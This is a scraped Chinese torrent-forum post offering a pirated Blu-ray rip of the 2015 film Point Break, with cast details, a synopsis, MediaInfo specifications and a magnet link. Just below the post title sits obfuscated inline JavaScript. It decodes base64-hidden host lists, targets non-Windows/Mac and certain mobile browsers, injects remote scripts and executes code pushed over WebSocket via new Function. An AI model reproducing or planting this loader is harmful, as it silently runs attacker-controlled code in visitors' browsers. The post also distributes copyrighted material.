极盗者[简繁字幕]Point.Break.2015.BluRay.1080p.DTS-HD.MA7.1.x265.10bit-迅雷下载 11.64GB

版主小s 2月前 312

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 极盗者 / 极限追捕(港) / 飙风特攻(台) / 惊爆点 / 新终极豪情
◎片  名 Point Break
◎年  代 2015
◎产  地 中国大陆 / 德国 / 美国 / 奥地利 / 意大利 / 加拿大
◎类  别 动作 / 犯罪 / 运动
◎语  言 英语 / 法语 / 西班牙语
◎上映日期 2015-12-04(中国大陆) / 2015-12-25(美国)
◎IMDb链接 https://www.imdb.com/title/tt2058673/
◎豆瓣评分 7.1/10 (99144人评价)
◎豆瓣链接 https://movie.douban.com/subject/25809384/
◎片  长 113分钟
◎导  演 埃里克松·科尔 Ericson Core (id:1281272)
◎编  剧 科特·维莫 Kurt Wimmer (id:1274260)
       瑞克·金 Rick King (id:1276499)
       W·彼得·伊利夫 W. Peter Iliff (id:1324299)
◎演  员 埃德加·拉米雷兹 édgar Ramírez (id:1000230)
       卢克·布雷西 Luke Bracey (id:1338326)
       雷·温斯顿 Ray Winstone (id:1006977)
       泰莉莎·帕尔墨 Teresa Palmer (id:1031836)
       马蒂亚斯·瓦雷拉 Matias Varela (id:1135870)
       克雷蒙斯·施伊克 Clemens Schick (id:1320236)
       托拜厄斯·桑特尔曼 Tobias Santelmann (id:1342063)
       麦克斯·泰瑞奥 Max Thieriot (id:1027235)
       德尔罗伊·林多 Delroy Lindo (id:1040621)
       尼科莱·金斯基 Nikolai Kinski (id:1022985)
       格娜萨斯·巴伯 Glynis Barber (id:1064016)
       史蒂夫·图森特 Steve Toussaint (id:1154996)
       詹姆斯·勒格罗 James LeGros (id:1055191)
       帕特里克·德威恩 Patrick Dewayne (id:1187617)
       塞马斯·F·萨金特 Seumas F. Sargent (id:1413315)
       纽曼·阿卡 Numan Acar (id:1344727)
       莱尔德·约翰·哈密尔顿 Laird John Hamilton (id:1032486)
       克里斯森科赫 Christian Koch (id:1102881)
       杰夫·伯勒尔 Jeff Burrell (id:1340580)
       Francesco Martino Francesco Martino (id:1191773)
       杰拉德·摩纳科 Gerard Monaco (id:1376465)
       Bob Burnquist Bob Burnquist (id:1160978)
       萨尔·马塞克拉 Sal Masekela (id:1050219)
       布莱特·罗森博格 Brett Rosenberg (id:1296070)
       史蒂夫·青木 Steve Aoki (id:1271234)
       Eric Koston Eric Koston (id:1173704)
       Chris Sharma Chris Sharma (id:1243221)
       杰米斯·巴特勒 Jaymes Butler (id:1324699)
       Manfred Callsen Manfred Callsen (id:1075660)
       埃莱娜·卡多纳 Hélène Cardona (id:1344847)
       理查德·艾沃特 Ricardo Ewert (id:1399683)
       托拜厄斯·劳特伯格 Tobias Lauterberg (id:1105807)
       犹大·刘易斯 Judah Lewis (id:1350091)
       亚历山大·雅辛 Alexander Yassin (id:1395235)
       丹·密茨 Dan Mintz (id:1417958)
       琼基·XL Junkie XL (id:1037776)
       埃里克松·科尔 Ericson Core (id:1281272)
       特里·马里奥特 Terry Marriott (id:1404975)
       瑞恩·艾伦 Ryan Allen (id:1247853)

◎标  签 极限运动 / 冒险 / 动作 / 美国 / 犯罪 / 运动 / 2015 / 自由

◎简  介
  年轻的FBI特工强尼·犹他(卢克·布雷西 Luke Bracey 饰),潜伏到一队喜欢寻找刺激挑战的盗匪里,该队伍由富有个人魅力的鲍迪(埃德加·拉米雷兹 édgar Ramírez 饰)领导。这些盗匪被怀疑是在用极不寻常的方式进行着系列犯罪。在与鲍迪这一伙人的交往中,犹他发现自己无可自拔的与这伙人产生了伙伴情谊,犹他陷入了职业伦理与追求真我之间的矛盾,他放弃了自己的一切,加入到了对人类极限界的八项巅峰挑战的追寻中……

  1. General

  2. Unique ID                                : 327007472658592967384752593313997284208 (0xF603592E53F0614D96EF083559846370)

  3. Complete name                            : [email protected]DQ.COM.mkv

  4. Format                                   : Matroska

  5. Format version                           : Version 4

  6. File size                                : 11.6 GiB

  7. Duration                                 : 1 h 53 min

  8. Overall bit rate mode                    : Variable

  9. Overall bit rate                         : 14.6 Mb/s

  10. Encoded date                             : UTC 2021-07-15 07:26:36

  11. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@High

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 53 min

  20. Bit rate                                 : 9 478 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 800 pixels

  23. Display aspect ratio                     : 2.40:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 23.976 (24000/1001/53354) FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.257

  30. Stream size                              : 7.54 GiB (65%)

  31. Title                                    : HEVC, [email protected]@High, 24/1.001 fps @ 9477 kbps

  32. Writing library                          : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings                        : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / total-frames=163778 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language                                 : English

  35. Default                                  : Yes

  36. Forced                                   : No

  37. Color range                              : Limited

  38. Color primaries                          : BT.709

  39. Transfer characteristics                 : BT.709

  40. Matrix coefficients                      : BT.709


  41. Audio

  42. ID                                       : 2

  43. Format                                   : DTS XLL

  44. Format/Info                              : Digital Theater Systems

  45. Commercial name                          : DTS-HD Master Audio

  46. Codec ID                                 : A_DTS

  47. Duration                                 : 1 h 53 min

  48. Bit rate mode                            : Variable

  49. Bit rate                                 : 5 102 kb/s

  50. Channel(s)                               : 8 channels

  51. Channel layout                           : C L R LFE Lb Rb Lss Rss

  52. Sampling rate                            : 48.0 kHz

  53. Frame rate                               : 93.750 FPS (512 SPF)

  54. Bit depth                                : 24 bits

  55. Compression mode                         : Lossless

  56. Stream size                              : 4.06 GiB (35%)

  57. Title                                    : English DTS-HD Master Audio 7.1 @ 5102 kbps

  58. Language                                 : English

  59. Default                                  : Yes

  60. Forced                                   : No


  61. Text #1

  62. ID                                       : 3

  63. Format                                   : PGS

  64. Codec ID                                 : S_HDMV/PGS

  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration                                 : 1 h 52 min

  67. Bit rate                                 : 21.2 kb/s

  68. Count of elements                        : 1846

  69. Stream size                              : 17.1 MiB (0%)

  70. Title                                    : Eng/SUP

  71. Language                                 : English

  72. Default                                  : No

  73. Forced                                   : No


  74. Text #2

  75. ID                                       : 4

  76. Format                                   : PGS

  77. Codec ID                                 : S_HDMV/PGS

  78. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration                                 : 1 h 37 min

  80. Bit rate                                 : 14.6 kb/s

  81. Count of elements                        : 1792

  82. Stream size                              : 10.2 MiB (0%)

  83. Title                                    : Chs/SUP  简体

  84. Language                                 : Chinese

  85. Default                                  : Yes

  86. Forced                                   : No


  87. Text #3

  88. ID                                       : 5

  89. Format                                   : PGS

  90. Codec ID                                 : S_HDMV/PGS

  91. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration                                 : 1 h 37 min

  93. Bit rate                                 : 14.8 kb/s

  94. Count of elements                        : 1792

  95. Stream size                              : 10.4 MiB (0%)

  96. Title                                    : Cht/SUP  繁体

  97. Language                                 : Chinese

  98. Default                                  : No

  99. Forced                                   : No


  100. Menu

  101. 00:00:00.000                             : en:第 01 章

  102. 00:10:11.820                             : en:第 02 章

  103. 00:21:05.139                             : en:第 03 章

  104. 00:29:20.926                             : en:第 04 章

  105. 00:42:44.896                             : en:第 05 章

  106. 00:50:05.794                             : en:第 06 章

  107. 01:03:19.462                             : en:第 07 章

  108. 01:12:43.943                             : en:第 08 章

  109. 01:20:40.419                             : en:第 09 章

  110. 01:27:14.521                             : en:第 10 章

  111. 01:32:44.350                             : en:第 11 章

  112. 01:39:02.603                             : en:第 12 章

贼TM好看


TAGS 动作 犯罪 运动

磁力链:
  • magnet:?xt=urn:btih:EEDFC1524159580C5B5FB46F71857C30ECC5B86E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖